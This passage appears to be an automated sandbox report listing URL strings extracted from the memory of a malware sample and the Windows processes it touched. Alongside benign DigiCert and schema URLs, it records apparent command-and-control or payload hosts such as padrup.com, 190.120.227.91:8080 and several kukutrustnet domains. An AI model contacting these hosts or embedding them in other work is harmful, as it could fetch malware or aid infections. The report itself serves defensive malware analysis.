            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?4d57b0b=162199062;
            Source: PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?53c2ee=32936340
            Source: PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?53c2ee=32936340F
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?588b379=464224605
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?653dba7=849272120
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?653dba7=849272120(
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?70c2488=591181480
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?7ca48dd=653487185
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?7ca48dd=6534871858
            Source: PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B7B000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?9db5459=1322951368
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?9db5459=1322951368_
Source: PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B61000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?c5c499=38882763
Source: PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B61000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?c5c499=38882763f
Source: PfBjDhHzvV.exe, 00000000.00000002.2241468768.0000000003EBB000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://190.120.227.91:8080/sobakavolos.gifK
Source: PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2236989876.0000000000C93000.00000004.10000000.00040000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000003.1368382163.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000003.1368144994.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2235952393.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2239052487.00000000011B9000.00000004.00000010.00020000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001D.00000002.2674188506.00000000024D3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001E.00000002.2680528942.0000000002633000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001F.00000002.2675030035.00000000023B3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000020.00000002.2659610605.0000000000DE3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000021.00000002.2643179759.0000000000363000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000022.00000002.2678320117.0000000002EC3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmp | String found in binary or memory: http://89.11
Source: PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmp | String found in binary or memory: http://89.119.67.154/testo5/
Source: PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmp | String found in binary or memory: http://89.119.67.154/testo5/http://kukutrustnet777.info/home.gifhttp://kukutrustnet888.info/home.gif
Source: explorer.exe, 0000000A.00000000.1446640101.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2836722675.000000000730B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1450832815.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2275899145.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279215811.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279706971.000000000730A000.00000004.00000001.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000000.1725623800.00000151AB1E9000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000002.2439977862.00000151AB221000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000000.1725623800.00000151AB262000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000002.2439977862.00000151AB262000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000000.1725623800.00000151AB221000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000002.2439977862.00000151AB1E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: svchost.exe, 00000008.00000000.1429731609.000001D959FF4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000000.1429731609.000001D959FEC000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: explorer.exe, 0000000A.00000000.1446640101.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2836722675.000000000730B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1450832815.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2275899145.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279215811.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279706971.000000000730A000.00000004.00000001.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000000.1725623800.00000151AB1E9000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000002.2439977862.00000151AB221000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000000.1725623800.00000151AB262000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000002.2439977862.00000151AB262000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000000.1725623800.00000151AB221000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000002.2439977862.00000151AB1E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: svchost.exe, 00000008.00000000.1429731609.000001D959FF4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000000.1429731609.000001D959FEC000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: SearchApp.exe, 0000000F.00000000.1566609930.000001F49BD00000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1550246125.000001F49A7D8000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1544825870.000001EC94D51000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: smartscreen.exe, 00000014.00000000.1725623800.00000151AB221000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000002.2439977862.00000151AB1E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: svchost.exe, 00000008.00000000.1429731609.000001D959FF4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000000.1429731609.000001D959FEC000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000F65000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B93000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ifdnzact.com/?dn=padrup.com&pid=9PO755G95
Source: PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmp | String found in binary or memory: http://kukutrustnet777.info/home.gif
Source: PfBjDhHzvV.exe, PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe | String found in binary or memory: http://kukutrustnet777888.info/
Source: PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://kukutrustnet777888.info/DisableTaskMgrSoftware
Source: PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmp | String found in binary or memory: http://kukutrustnet888.info/home.gif
Source: PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmp | String found in binary or memory: http://kukutrustnet987.info/home.gif
Source: StartMenuExperienceHost.exe, 0000000D.00000000.1498293624.000001A43FFC2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ns.a.0
Source: StartMenuExperienceHost.exe, 0000000D.00000000.1498293624.000001A43FFC2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ns.adobe.c.0
Source: StartMenuExperienceHost.exe, 0000000D.00000000.1498293624.000001A43FFC2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ns.adobe.hoL2
Source: StartMenuExperienceHost.exe, 0000000D.00000000.1498293624.000001A43FFC2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ns.adora
Source: StartMenuExperienceHost.exe, 0000000D.00000000.1498293624.000001A43FFC2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ns.ph
Source: svchost.exe, 00000008.00000000.1429731609.000001D959FF4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000000.1429731609.000001D959FEC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1446640101.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2836722675.000000000730B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1450832815.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2275899145.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279215811.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279706971.000000000730A000.00000004.00000001.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000000.1725623800.00000151AB1E9000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000002.2439977862.00000151AB221000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000000.1730192772.00000159AD200000.00000004.00000001.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000002.2441166596.00000159AD200000.00000004.00000001.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000000.1725623800.00000151AB262000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000002.2439977862.00000151AB262000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000000.1725623800.00000151AB221000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000002.2439977862.00000151AB1E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: SearchApp.exe, 0000000F.00000000.1566609930.000001F49BD00000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1550246125.000001F49A7D8000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1544825870.000001EC94D51000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: smartscreen.exe, 00000014.00000000.1725623800.00000151AB221000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000000.1725623800.00000151AB262000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000002.2439977862.00000151AB262000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: SearchApp.exe, 0000000F.00000000.1673985006.000001F4B3213000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crlx
Source: SearchApp.exe, 0000000F.00000000.1566609930.000001F49BD00000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1548678406.000001EC9A5C0000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1560203634.000001F49B213000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: dwm.exe, 00000005.00000000.1392615637.00000262ED790000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000005.00000002.3004388837.00000262ED790000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://osoft.co_2010-06X
Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000F65000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/1721684OEXECUTE=OPTIN
Source: PfBjDhHzvV.exe, 00000000.00000002.2241468768.0000000003EBB000.00000004.00000010.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2236989876.0000000000C93000.00000004.10000000.00040000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000003.1368382163.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000003.1368144994.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2235952393.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2239052487.00000000011B9000.00000004.00000010.00020000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001D.00000002.2674188506.00000000024D3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001E.00000002.2680528942.0000000002633000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001F.00000002.2675030035.00000000023B3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000020.00000002.2659610605.0000000000DE3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000021.00000002.2643179759.0000000000363000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000022.00000002.2678320117.0000000002EC3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2713401139.0000000002859000.00000004.00000010.00020000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2707649439.0000000002713000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gif
Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gif?14117e3=189388539
Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gif?158b8302=722929156
Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gif?158b8302=722929156K
Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gif?158b8302=722929156e
Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FAC000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gif?1bfc4aa7=-538815176
Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gif?1bfc4aa7=-538815176G
Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gif?1bfc4aa7=-538815176Y
Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gif?1bfc4aa7=-538815176k
Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gif?1edc267=64718030
Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gif?2a0a14c=132244452
Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gif?2a0a14c=132244452K
Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gif?3467cb5=274755465
Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gif?3467cb5=274755465#
Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gif?3f9f77c=600421212
Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gif?3f9f77c=600421212=
Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gif?4b65019=711512289
Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000F65000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FA1000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FAC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gif?52dc95=21721684
Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FAC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gif?52dc95=21721684~
Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gif?568bd78=635252296
Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gif?617d87e=1022260460
Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gif?617d87e=1022260460)
Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gif?6eac3db=348146577
Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gif?7a93601=771179526b
Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gif?7a93601=771179526q
Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gif?87df311=569887812
Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gif?87df311=569887812x
Source: faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2665565743.0000000000917000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gif?8dc219=65031855
Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gif?a66df5=87257000
Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FAC000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gif?f24e375=-2008285411
Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gif?f24e375=-2008285411y
Source: PfBjDhHzvV.exe, 00000000.00000002.2241468768.0000000003EBB000.00000004.00000010.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2236989876.0000000000C93000.00000004.10000000.00040000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000003.1368382163.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000003.1368144994.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2235952393.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2239052487.00000000011B9000.00000004.00000010.00020000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001D.00000002.2674188506.00000000024D3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001E.00000002.2680528942.0000000002633000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001F.00000002.2675030035.00000000023B3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000020.00000002.2659610605.0000000000DE3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000021.00000002.2643179759.0000000000363000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000022.00000002.2678320117.0000000002EC3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2713401139.0000000002859000.00000004.00000010.00020000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2707649439.0000000002713000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gifhttp://190.120.227.91:8080/sobakavolos.gif
Source: faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2713401139.0000000002859000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://padrup.com/sobaka1.gifhttp://190.120.227.91:8080/sobakavolos.gifFDC3C2625A60E29DB5AF20451090A
Source: SearchApp.exe, 0000000F.00000000.1588671349.000001F4AE1F6000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schema.skype.com/Mention
Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase
Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.Component.WebApi.ClientConditionsProcessor
Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel
Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.Catalog
Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.Catalogp
Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.PaymentInstruments
Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.PaymentInstrumentsp
Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.Profile
Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.Profilep
Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.Purchase
Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.Purchasep
Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.StoreEdge
Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.StoreEdgep
Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModelp
Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchasep
Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/System.Collections.Generic
Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/System.Collections.Genericp
Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/Windows.Web.Http
